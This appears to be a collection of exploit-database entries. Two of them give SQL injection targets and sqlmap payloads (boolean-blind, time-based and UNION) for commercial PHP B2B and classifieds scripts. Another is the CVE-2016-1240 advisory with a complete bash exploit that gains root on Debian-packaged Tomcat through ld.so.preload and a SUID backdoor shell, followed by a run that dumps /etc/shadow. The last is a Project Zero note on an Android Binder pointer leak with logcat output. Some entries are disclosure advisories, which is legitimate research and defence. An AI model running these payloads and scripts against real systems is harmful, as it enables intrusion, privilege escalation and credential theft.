| Date : 06 October 2016
| Author : OoN_Boy
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Technology : PHP
| Database : MySQL
| Price : $ 249
| Description : Have an idea about starting your own Alibaba clone website and thinking how to implement it? Our B2B Portal Script
is the platform to transform your idea into the practical world. It is developed in PHP and MySQL and can help global
portals to manage their online transactions with efficiency
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Exploit : http://localhost/advancedb2b/view-product.php?pid=294'
| Aadmin Page : http://localhost/[path]/admin/index.php
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Proof of concept : sqlmap -u "http://localhost/advancedb2b/view-product.php?pid=294"
[x]========================================================================================================================================[x]
---
Parameter: pid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=294' AND 1754=1754 AND 'whqn'='whqn
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: pid=294' AND SLEEP(5) AND 'nGqC'='nGqC
Type: UNION query
Title: Generic UNION query (NULL) - 33 columns
Payload: pid=294' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178766b71,0x656f5962547177636a47435158754754736267535a4d515a4d4c454e535052496652505243795849,0x7176626271),NULL,NULL-- lwGp
---
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Greetz : antisecurity.org batamhacker.or.id
| Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Hi All long time no see ^_^
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Title : PHP Classifieds Rental Script Blind SQL Vulnerabilities
| Software : PHP Classifieds Rental Script
| Vendor : http://www.i-netsolution.com/
| Demo : http://www.i-netsolution.com/item/php-classifieds-rental-script/244993
| Date : 06 October 2016
| Author : OoN_Boy
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Technology : PHP
| Database : MySQL
| Price : $ 99
| Description : PHP Classifieds Rental Script The PHP Rental Classifieds Script is one among the limited software's, which are designed
so user-friendly that anyone with minimal knowledge of operating a computer can utilize it to its optimum. Besides being
an easy-to- use software, this Property Rental Script
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Exploit : http://localhost/product_details.php?refid=%Inject_Here%1319258872
| Aadmin Page : http://localhost/[path]/admin/index.php
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Proof of concept : sqlmap -u "http://localhost/product_details.php?refid=1319258872" --invalid-string
[x]========================================================================================================================================[x]
---
Parameter: refid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: refid=1319258872' AND 3912=3912 AND 'HTMi'='HTMi
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: refid=1319258872' OR SLEEP(5) AND 'QwXZ'='QwXZ
Type: UNION query
Title: MySQL UNION query (NULL) - 26 columns
Payload: refid=xCUcyB' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x644e6e5046537647684864705a527667796f454c666c4656644a73506d4e627a48574969424a4756,0x7176786271),NULL,NULL,NULL,NULL,NULL#
---
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Greetz : antisecurity.org batamhacker.or.id
| Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Hi All long time no see ^_^
[x]========================================================================================================================================[x]
=============================================
- Discovered by: Dawid Golunski
- http://legalhackers.com
- dawid (at) legalhackers.com
- CVE-2016-1240
- Release date: 30.09.2016
- Revision: 1
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
Apache Tomcat packaging on Debian-based distros - Local Root Privilege Escalation
Affected debian packages:
Tomcat 8 <= 8.0.36-2
Tomcat 7 <= 7.0.70-2
Tomcat 6 <= 6.0.45+dfsg-1~deb8u1
Ubuntu systems are also affected. See section VII. for details.
Other systems using the affected debian packages may also be affected.
II. BACKGROUND
-------------------------
"The Apache Tomcat® software is an open source implementation of the
Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket
technologies. The Java Servlet, JavaServer Pages, Java Expression Language
and Java WebSocket specifications are developed under the Java Community
Process.
The Apache Tomcat software is developed in an open and participatory
environment and released under the Apache License version 2.
The Apache Tomcat project is intended to be a collaboration of the
best-of-breed developers from around the world.
Apache Tomcat software powers numerous large-scale, mission-critical web
applications across a diverse range of industries and organizations.
Some of these users and their stories are listed on the PoweredBy wiki page.
"
http://tomcat.apache.org/
III. INTRODUCTION
-------------------------
Tomcat (6, 7, 8) packages provided by default repositories on Debian-based
distributions (including Debian, Ubuntu etc.) provide a vulnerable
tomcat init script that allows local attackers who have already gained access
to the tomcat account (for example, by exploiting an RCE vulnerability
in a java web application hosted on Tomcat, uploading a webshell etc.) to
escalate their privileges from tomcat user to root and fully compromise the
target system.
IV. DESCRIPTION
-------------------------
The vulnerability is located in the tomcat init script provided by affected
packages, normally installed at /etc/init.d/tomcatN.
The script for tomcat7 contains the following lines:
-----[tomcat7]----
# Run the catalina.sh script as a daemon
set +e
touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
-------[eof]------
Local attackers who have gained access to the server in the context of the
tomcat user (for example, through a vulnerability in a web application) would
be able to replace the log file with a symlink to an arbitrary system file
and escalate their privileges to root once Tomcat init script (running as root)
re-opens the catalina.out file after a service restart, reboot etc.
As attackers would already have a tomcat account at the time of exploitation,
they could also kill the tomcat processes to introduce the need for a restart.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
------[ tomcat-rootprivesc-deb.sh ]------
#!/bin/bash
#
# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
#
# CVE-2016-1240
#
# Discovered and coded by:
#
# Dawid Golunski
# http://legalhackers.com
#
# This exploit targets Tomcat (versions 6, 7 and 8) packaging on
# Debian-based distros including Debian, Ubuntu etc.
# It allows attackers with a tomcat shell (e.g. obtained remotely through a
# vulnerable java webapp, or locally via weak permissions on webapps in the
# Tomcat webroot directories etc.) to escalate their privileges to root.
#
# Usage:
# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]
#
# The exploit can used in two ways:
#
# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly
# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted.
# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up
# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)
#
# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to
# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.
# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a
# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can
# then add arbitrary commands to the file which will be executed with root privileges by
# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default
# Ubuntu/Debian Tomcat installations).
#
# See full advisory for details at:
# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
#
# Disclaimer:
# For testing purposes only. Do no harm.
#
BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/tomcatrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"
function cleanexit {
# Cleanup
echo -e "\n[+] Cleaning up..."
rm -f $PRIVESCSRC
rm -f $PRIVESCLIB
rm -f $TOMCATLOG
touch $TOMCATLOG
if [ -f /etc/ld.so.preload ]; then
echo -n > /etc/ld.so.preload 2>/dev/null
fi
echo -e "\n[+] Job done. Exiting with code $1 \n"
exit $1
}
function ctrl_c() {
echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
cleanexit 0
}
#intro
echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"
# Args
if [ $# -lt 1 ]; then
echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n"
exit 3
fi
if [ "$2" = "-deferred" ]; then
mode="deferred"
else
mode="active"
fi
# Priv check
echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`"
id | grep -q tomcat
if [ $? -ne 0 ]; then
echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n"
exit 3
fi
# Set target paths
TOMCATLOG="$1"
if [ ! -f $TOMCATLOG ]; then
echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\n"
exit 3
fi
echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG"
# [ Deferred exploitation ]
# Symlink the log file to /etc/default/locale file which gets executed daily on default
# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.
# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been
# restarted and file owner gets changed.
if [ "$mode" = "deferred" ]; then
rm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG
if [ $? -ne 0 ]; then
echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
cleanexit 3
fi
echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"
echo -e "\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`"
echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot"
echo -ne "\n you'll be able to add arbitrary commands to the file which will get executed with root privileges"
echo -ne "\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\n\n"
exit 0
fi
# [ Active exploitation ]
trap ctrl_c INT
# Compile privesc preload library
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
cat <<_solibeof_>$PRIVESCSRC
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
uid_t geteuid(void) {
static uid_t (*old_geteuid)();
old_geteuid = dlsym(RTLD_NEXT, "geteuid");
if ( old_geteuid() == 0 ) {
chown("$BACKDOORPATH", 0, 0);
chmod("$BACKDOORPATH", 04777);
unlink("/etc/ld.so.preload");
}
return old_geteuid();
}
_solibeof_
gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl
if [ $? -ne 0 ]; then
echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
cleanexit 2;
fi
# Prepare backdoor shell
cp $BACKDOORSH $BACKDOORPATH
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"
# Safety check
if [ -f /etc/ld.so.preload ]; then
echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
cleanexit 2
fi
# Symlink the log file to ld.so.preload
rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG
if [ $? -ne 0 ]; then
echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
cleanexit 3
fi
echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"
# Wait for Tomcat to re-open the logs
echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..."
echo -e "\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)"
while :; do
sleep 0.1
if [ -f /etc/ld.so.preload ]; then
echo $PRIVESCLIB > /etc/ld.so.preload
break;
fi
done
# /etc/ld.so.preload file should be owned by tomcat user at this point
# Inject the privesc.so shared library to escalate privileges
echo $PRIVESCLIB > /etc/ld.so.preload
echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`"
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"
# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
sudo --help 2>/dev/null >/dev/null
# Check for the rootshell
ls -l $BACKDOORPATH | grep rws | grep -q root
if [ $? -eq 0 ]; then
echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
echo -e "\n\033[94mPlease tell me you're seeing this too ;) \033[0m"
else
echo -e "\n[!] Failed to get root"
cleanexit 2
fi
# Execute the rootshell
echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n"
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
$BACKDOORPATH -p
# Job done.
cleanexit 0
--------------[ EOF ]--------------------
Example exploit run:
~~~~~~~~~~~~~~
tomcat7@ubuntu:/tmp$ id
uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)
tomcat7@ubuntu:/tmp$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat
ii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries
ii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine
ii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files
tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out
Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
CVE-2016-1240
Discovered and coded by:
Dawid Golunski
http://legalhackers.com
[+] Starting the exploit in [active] mode with the following privileges:
uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)
[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out
[+] Compiling the privesc shared library (/tmp/privesclib.c)
[+] Backdoor/low-priv shell installed at:
-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh
[+] Symlink created at:
lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload
[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...
You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)
[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges:
-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload
[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload
[+] The /etc/ld.so.preload file now contains:
/tmp/privesclib.so
[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
[+] Rootshell got assigned root SUID perms at:
-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh
Please tell me you're seeing this too ;)
[+] Executing the rootshell /tmp/tomcatrootsh now!
tomcatrootsh-4.3# id
uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)
tomcatrootsh-4.3# whoami
root
tomcatrootsh-4.3# head -n3 /etc/shadow
root:$6$oaf[cut]:16912:0:99999:7:::
daemon:*:16912:0:99999:7:::
bin:*:16912:0:99999:7:::
tomcatrootsh-4.3# exit
exit
[+] Cleaning up...
[+] Job done. Exiting with code 0
VI. BUSINESS IMPACT
-------------------------
Local attackers who have gained access to tomcat user account (for example
remotely via a vulnerable web application, or locally via weak webroot perms),
could escalate their privileges to root and fully compromise the affected system.
VII. SYSTEMS AFFECTED
-------------------------
The following Debian package versions are affected:
Tomcat 8 <= 8.0.36-2
Tomcat 7 <= 7.0.70-2
Tomcat 6 <= 6.0.45+dfsg-1~deb8u1
A more detailed lists of affected packages can be found at:
Debian:
https://security-tracker.debian.org/tracker/CVE-2016-1240
Ubuntu:
http://www.ubuntu.com/usn/usn-3081-1/
Other systmes that use Tomcat packages provided by Debian may also be affected.
VIII. SOLUTION
-------------------------
Debian Security Team was contacted and has fixed affected upstream packages.
Update to the latest tomcat packages provided by your distribution.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
The exploit's sourcecode
http://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh
CVE-2016-1240
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240
Ubuntu Security Notice USN-3081-1:
http://www.ubuntu.com/usn/usn-3081-1/
Debian Security Advisory DSA-3669-1 (tomcat7):
https://lists.debian.org/debian-security-announce/2016/msg00249.html
https://www.debian.org/security/2016/dsa-3669
Debian Security Advisory DSA-3670-1 (tomcat8):
https://www.debian.org/security/2016/dsa-3670
https://security-tracker.debian.org/tracker/CVE-2016-1240
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
30.09.2016 - Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=860
When frameworks/native/libs/binder/Parcel.cpp reads e.g. a string from a parcel, it does not verify that the string doesn't overlap with any byte range that was tagged as a binder object by the sender. When an attacker sends a parcel to a victim process that contains an unexpected binder handle referring to an object from the victim process where string data is expected, the kernel replaces the attacker-specified handle with a pointer to the object in the victim process. The victim then treats that pointer as part of the attacker-supplied input data, possibly making it available to the attacker at a later point in time.
One example of such an echo service is the "clipboard" service: Strings written using setPrimaryClip() can be read back using getPrimaryClip().
A PoC that leaks the addresses of the "permission", "package" and "clipboard" services from system_server is attached (source code and apk).
Its logcat output looks like this:
===============
[...]
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 2a85
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 7362
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 17f
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 0
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: fd80
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 367b
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 71
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 0
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 4c0
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 2964
01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 71
01-15 05:20:54.530 19158-19158/com.google.jannh.pointerleak E/leaker: == service "permission" ==
type: BINDER_TYPE_BINDER
object: 0x000000712967e260
== service "package" ==
type: BINDER_TYPE_BINDER
object: 0x000000712963cfc0
== service "clipboard" ==
type: BINDER_TYPE_BINDER
object: 0x00000071367bfd80
===============
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40449.zip